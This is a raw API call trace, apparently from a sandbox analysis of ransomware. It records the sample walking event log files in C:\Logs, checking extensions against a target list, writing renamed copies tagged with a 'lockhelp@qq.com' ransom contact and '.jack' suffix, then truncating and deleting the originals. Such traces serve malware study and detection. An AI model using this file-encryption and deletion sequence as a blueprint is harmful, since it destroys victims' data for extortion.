4 [0209.698] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0209.698] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 40 [0209.698] lstrlenW (lpString=".jpg") returned 4 [0209.698] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0209.699] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0209.699] lstrlenW (lpString="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 74 [0209.699] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx" (normalized: "c:\\logs\\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0209.711] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=69632) returned 1 [0209.712] CloseHandle (hObject=0x3dc) returned 1 [0209.712] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx" (normalized: "c:\\logs\\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx")) returned 0x20 [0209.712] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0209.712] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx" (normalized: "c:\\logs\\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0209.712] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0209.712] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0209.712] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0209.726] GetLastError () returned 0x0 [0209.726] ReadFile (in: hFile=0x3dc, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x11000, lpOverlapped=0x0) returned 1 [0209.729] WriteFile (in: hFile=0x44c, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x11010, lpOverlapped=0x0) returned 1 [0209.730] ReadFile (in: hFile=0x3dc, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x0, lpOverlapped=0x0) returned 1 [0209.730] WriteFile (in: hFile=0x44c, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x168, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x168, lpOverlapped=0x0) returned 1 [0209.730] SetEndOfFile (hFile=0x44c) returned 1 [0209.731] CloseHandle (hObject=0x44c) returned 1 [0209.733] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0209.733] SetEndOfFile (hFile=0x3dc) returned 1 [0209.734] CloseHandle (hObject=0x3dc) returned 1 [0209.735] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0209.735] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx" (normalized: "c:\\logs\\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx")) returned 1 [0209.739] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 82 [0209.740] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 82 [0209.740] lstrlenW (lpString=".doc") returned 4 [0209.740] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0209.740] lstrlenW (lpString=".docx") returned 5 [0209.740] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0209.740] lstrlenW (lpString=".pdf") returned 4 [0209.740] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0209.740] lstrlenW (lpString=".xls") returned 4 [0209.740] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0209.740] lstrlenW (lpString=".xlsx") returned 5 [0209.740] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0209.740] lstrlenW (lpString=".ppt") returned 4 [0209.740] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0209.740] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 82 [0209.740] lstrlenW (lpString=".zip") returned 4 [0209.740] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0209.740] lstrlenW (lpString=".rar") returned 4 [0209.740] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0209.740] lstrlenW (lpString=".bz2") returned 4 [0209.740] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0209.740] lstrlenW (lpString=".7z") returned 3 [0209.740] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0209.740] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 82 [0209.740] lstrlenW (lpString=".dbf") returned 4 [0209.740] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0209.740] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 82 [0209.740] lstrlenW (lpString=".1cd") returned 4 [0209.740] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0209.740] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 82 [0209.741] lstrlenW (lpString=".jpg") returned 4 [0209.741] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0209.741] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 82 [0209.741] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 82 [0209.741] lstrlenW (lpString=".doc") returned 4 [0209.741] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0209.741] lstrlenW (lpString=".docx") returned 5 [0209.741] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0209.741] lstrlenW (lpString=".pdf") returned 4 [0209.741] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0209.741] lstrlenW (lpString=".xls") returned 4 [0209.741] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0209.741] lstrlenW (lpString=".xlsx") returned 5 [0209.741] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0209.741] lstrlenW (lpString=".ppt") returned 4 [0209.741] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0209.741] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 82 [0209.741] lstrlenW (lpString=".zip") returned 4 [0209.741] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0209.741] lstrlenW (lpString=".rar") returned 4 [0209.741] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0209.741] lstrlenW (lpString=".bz2") returned 4 [0209.741] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0209.741] lstrlenW (lpString=".7z") returned 3 [0209.745] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0209.745] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 82 [0209.745] lstrlenW (lpString=".dbf") returned 4 [0209.745] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0209.745] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 82 [0209.745] lstrlenW (lpString=".1cd") returned 4 [0209.745] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0209.745] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 82 [0209.745] lstrlenW (lpString=".jpg") returned 4 [0209.745] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0209.745] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0209.745] lstrlenW (lpString="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 64 [0209.745] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-resource-exhaustion-detector%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0209.757] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=69632) returned 1 [0209.758] CloseHandle (hObject=0x420) returned 1 [0209.758] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-resource-exhaustion-detector%4operational.evtx")) returned 0x20 [0209.758] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-resource-exhaustion-detector%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0209.762] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-resource-exhaustion-detector%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0209.762] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0209.762] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0209.762] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-resource-exhaustion-detector%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0210.852] GetLastError () returned 0x0 [0210.863] ReadFile (in: hFile=0x420, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x11000, lpOverlapped=0x0) returned 1 [0210.865] WriteFile (in: hFile=0x454, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x11010, lpOverlapped=0x0) returned 1 [0210.866] ReadFile (in: hFile=0x420, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x0, lpOverlapped=0x0) returned 1 [0210.866] WriteFile (in: hFile=0x454, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x154, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x154, lpOverlapped=0x0) returned 1 [0210.866] SetEndOfFile (hFile=0x454) returned 1 [0210.867] CloseHandle (hObject=0x454) returned 1 [0210.868] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0210.868] SetEndOfFile (hFile=0x420) returned 1 [0210.869] CloseHandle (hObject=0x420) returned 1 [0210.869] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0210.871] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-resource-exhaustion-detector%4operational.evtx")) returned 1 [0210.871] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 72 [0210.871] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 72 [0210.871] lstrlenW (lpString=".doc") returned 4 [0210.871] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0210.871] lstrlenW (lpString=".docx") returned 5 [0210.871] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0210.871] lstrlenW (lpString=".pdf") returned 4 [0210.871] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0210.871] lstrlenW (lpString=".xls") returned 4 [0210.871] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0210.871] lstrlenW (lpString=".xlsx") returned 5 [0210.871] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0210.872] lstrlenW (lpString=".ppt") returned 4 [0210.872] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0210.872] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 72 [0210.872] lstrlenW (lpString=".zip") returned 4 [0210.872] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0210.872] lstrlenW (lpString=".rar") returned 4 [0210.872] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0210.872] lstrlenW (lpString=".bz2") returned 4 [0210.872] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0210.872] lstrlenW (lpString=".7z") returned 3 [0210.872] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0210.872] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 72 [0210.872] lstrlenW (lpString=".dbf") returned 4 [0210.872] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0210.872] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 72 [0210.872] lstrlenW (lpString=".1cd") returned 4 [0210.872] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0210.872] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 72 [0210.872] lstrlenW (lpString=".jpg") returned 4 [0210.872] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0210.872] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 72 [0210.872] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 72 [0210.872] lstrlenW (lpString=".doc") returned 4 [0210.872] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0210.872] lstrlenW (lpString=".docx") returned 5 [0210.872] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0210.872] lstrlenW (lpString=".pdf") returned 4 [0210.872] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0210.872] lstrlenW (lpString=".xls") returned 4 [0210.872] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0210.872] lstrlenW (lpString=".xlsx") returned 5 [0210.872] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0210.872] lstrlenW (lpString=".ppt") returned 4 [0210.872] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0210.872] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 72 [0210.872] lstrlenW (lpString=".zip") returned 4 [0210.873] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0210.873] lstrlenW (lpString=".rar") returned 4 [0210.873] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0210.873] lstrlenW (lpString=".bz2") returned 4 [0210.873] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0210.873] lstrlenW (lpString=".7z") returned 3 [0210.873] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0210.873] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 72 [0210.873] lstrlenW (lpString=".dbf") returned 4 [0210.873] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0210.873] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 72 [0210.873] lstrlenW (lpString=".1cd") returned 4 [0210.873] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0210.873] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 72 [0210.873] lstrlenW (lpString=".jpg") returned 4 [0210.873] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0210.873] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0210.873] lstrlenW (lpString="Microsoft-Windows-SMBClient%4Operational.evtx") returned 45 [0210.873] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0210.873] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=69632) returned 1 [0210.873] CloseHandle (hObject=0x420) returned 1 [0210.873] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4operational.evtx")) returned 0x20 [0210.874] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-smbclient%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0210.874] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0210.874] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0210.874] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0210.874] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-smbclient%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0210.874] GetLastError () returned 0x0 [0210.874] ReadFile (in: hFile=0x420, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x11000, lpOverlapped=0x0) returned 1 [0210.876] WriteFile (in: hFile=0x454, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x11010, lpOverlapped=0x0) returned 1 [0210.878] ReadFile (in: hFile=0x420, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x0, lpOverlapped=0x0) returned 1 [0210.878] WriteFile (in: hFile=0x454, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x12e, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x12e, lpOverlapped=0x0) returned 1 [0210.878] SetEndOfFile (hFile=0x454) returned 1 [0210.878] CloseHandle (hObject=0x454) returned 1 [0210.880] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0210.880] SetEndOfFile (hFile=0x420) returned 1 [0210.881] CloseHandle (hObject=0x420) returned 1 [0210.881] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0210.881] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4operational.evtx")) returned 1 [0210.881] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 53 [0210.881] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 53 [0210.881] lstrlenW (lpString=".doc") returned 4 [0210.881] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0210.882] lstrlenW (lpString=".docx") returned 5 [0210.882] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0210.882] lstrlenW (lpString=".pdf") returned 4 [0210.882] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0210.882] lstrlenW (lpString=".xls") returned 4 [0210.882] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0210.882] lstrlenW (lpString=".xlsx") returned 5 [0210.882] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0210.882] lstrlenW (lpString=".ppt") returned 4 [0210.882] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0210.882] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 53 [0210.882] lstrlenW (lpString=".zip") returned 4 [0210.882] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0210.882] lstrlenW (lpString=".rar") returned 4 [0210.882] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0210.882] lstrlenW (lpString=".bz2") returned 4 [0210.882] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0210.882] lstrlenW (lpString=".7z") returned 3 [0210.882] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0210.882] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 53 [0210.882] lstrlenW (lpString=".dbf") returned 4 [0210.882] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0210.882] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 53 [0210.882] lstrlenW (lpString=".1cd") returned 4 [0210.882] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0210.882] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 53 [0210.882] lstrlenW (lpString=".jpg") returned 4 [0210.882] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0210.882] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 53 [0210.882] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 53 [0210.882] lstrlenW (lpString=".doc") returned 4 [0210.882] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0210.882] lstrlenW (lpString=".docx") returned 5 [0210.882] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0210.882] lstrlenW (lpString=".pdf") returned 4 [0210.882] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0210.882] lstrlenW (lpString=".xls") returned 4 [0210.883] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0210.883] lstrlenW (lpString=".xlsx") returned 5 [0210.883] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0210.883] lstrlenW (lpString=".ppt") returned 4 [0210.883] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0210.883] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 53 [0210.883] lstrlenW (lpString=".zip") returned 4 [0210.883] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0210.883] lstrlenW (lpString=".rar") returned 4 [0210.883] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0210.883] lstrlenW (lpString=".bz2") returned 4 [0210.883] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0210.883] lstrlenW (lpString=".7z") returned 3 [0210.883] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0210.883] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 53 [0210.883] lstrlenW (lpString=".dbf") returned 4 [0210.883] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0210.883] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 53 [0210.883] lstrlenW (lpString=".1cd") returned 4 [0210.883] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0210.883] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 53 [0210.883] lstrlenW (lpString=".jpg") returned 4 [0210.883] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0210.883] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0210.883] lstrlenW (lpString="Microsoft-Windows-SmbClient%4Security.evtx") returned 42 [0210.883] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4security.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0210.885] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=69632) returned 1 [0210.885] CloseHandle (hObject=0x420) returned 1 [0210.885] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4security.evtx")) returned 0x20 [0210.885] 